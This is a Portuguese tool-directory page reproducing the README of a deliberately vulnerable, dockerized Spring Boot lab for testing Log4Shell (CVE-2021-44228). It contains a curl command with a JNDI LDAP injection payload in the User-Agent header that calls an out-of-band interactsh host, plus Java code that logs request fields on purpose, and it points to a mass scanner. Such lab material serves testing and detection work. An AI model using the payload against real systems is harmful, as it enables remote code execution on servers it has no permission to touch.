Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

Serviço Spring Boot dockerizado intencionalmente vulnerável ao Log4Shell (CVE-2021-44228) para testar ferramentas de detecção, payloads e capacidades de exploração em um ambiente local.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
132há 4 anosAinda não revisado

CVE-2021-44228 Serviço de Teste Spring Boot

Este é um projeto 'hello world' Spring Boot improvisado para testar suas ferramentas/payloads/capacidades de detecção localmente antes de usá-los em alvos de produção.

A versão configurada do Log4j é a 2.13.0

Construindo a imagem docker

root@kitploit:~
bash build.sh

Executando a imagem docker

root@kitploit:~
docker run -p 8080:8080 dwdi/log4shell

Testando / Acionando o CVE-2021-44228

Se você não tem o burp collaborator rodando na garagem, pode visitar este site para ter uma experiência similar: https://interactsh.com

root@kitploit:~
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

Ferramenta de scanner

Opcionalmente, você pode usar este repositório incrível para realizar varreduras locais/em massa: https://github.com/adilsoybali/Log4j-RCE-Scanner

Locais de acionamento

Esta vulnerabilidade consiste em forçar um valor controlado pelo usuário a ser registrado pelo framework de logging vulnerável. Pensando nisso, este aplicativo dummy simples suporta dois verbos HTTP (GET/PUT) e vários locais de injeção:

root@kitploit:~
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
root@kitploit:~
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

Contribuições / melhorias são bem-vindas.

Desculpe pela qualidade do código :) este projeto não é para exibição, mas para compartilhar/ajudar.

Baixar ferramenta